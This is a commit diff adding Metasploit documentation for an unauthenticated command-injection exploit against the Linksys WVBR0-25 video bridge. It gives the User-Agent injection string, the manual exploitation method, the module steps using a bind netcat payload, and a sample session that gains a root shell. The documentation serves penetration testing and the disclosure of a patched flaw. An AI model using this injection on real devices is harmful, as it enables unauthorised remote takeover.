Adding doc file for module linksys_wvbr0_user_agent_exec_noauth
parent
3dfb836768
commit
3b0f0aa358
|
@ -0,0 +1,49 @@
|
|||
## Vulnerable Application
|
||||
|
||||
This module exploits a command injection vulnerability in the [Linksys WVBR0-25](https://www.att.com/help/manuals/directv/dvrs.html) wireless video bridge. A description of the exploited vulnerability is available in the Vulnerability Details section of [this advisory](http://www.zerodayinitiative.com/advisories/ZDI-17-973/).
|
||||
The latest confirmed vulnerable firmware version is 1.0.39. It may be possible to downgrade newer versions to a vulnerable version, but since firmware images are not available for download, this cannot be verified.
|
||||
|
||||
There is no complete list of vulnerable firmware versions, however the check method can reliably detect whether a device is vulnerable. The check method browses to the root of the device's webserver with a User-Agent set to `"; printf "[random string]`. If the response contains an md5 hash of the random string, the device is vulnerable to command injection.
|
||||
|
||||
Manual exploitation would equate to browsing to the URI `http://<ip>/` with the User-Agent header set to `"; command;`.
|
||||
|
||||
Version 1.0.39 was confirmed vulnerable, and firmware 1.0.41 was released to fix the exploit.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Make sure the device is running.
|
||||
2. Start msfconsole.
|
||||
3. Do: ```use exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth```
|
||||
4. Do: ```set payload cmd/unix/bind_netcat```
|
||||
5. Do: ```set RHOST <ip>```
|
||||
6. Do: ```exploit```
|
||||
7. You should get a shell.
|
||||
|
||||
## Options
|
||||
|
||||
**PAYLOAD**
|
||||
|
||||
The `generic` and `netcat` payload types are valid.
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Firmware 1.0.39
|
||||
|
||||
The following is an example run getting a shell:
|
||||
|
||||
```
|
||||
msf > use exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth
|
||||
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set payload cmd/unix/bind_netcat
|
||||
payload => cmd/unix/bind_netcat
|
||||
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set RHOST 10.0.0.104
|
||||
RHOST => 10.0.0.104
|
||||
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > exploit
|
||||
|
||||
[*] 10.0.0.104:80 - Trying to access the device ...
|
||||
[*] Started bind handler
|
||||
[*] 10.0.0.104:80 - Exploiting...
|
||||
[*] Command shell session 1 opened (10.0.0.109:40541 -> 10.0.0.104:4444) at 2017-12-21 17:09:54 -0600
|
||||
id
|
||||
|
||||
uid=0(root) gid=0(root)
|
||||
```
|
Loading…
Reference in New Issue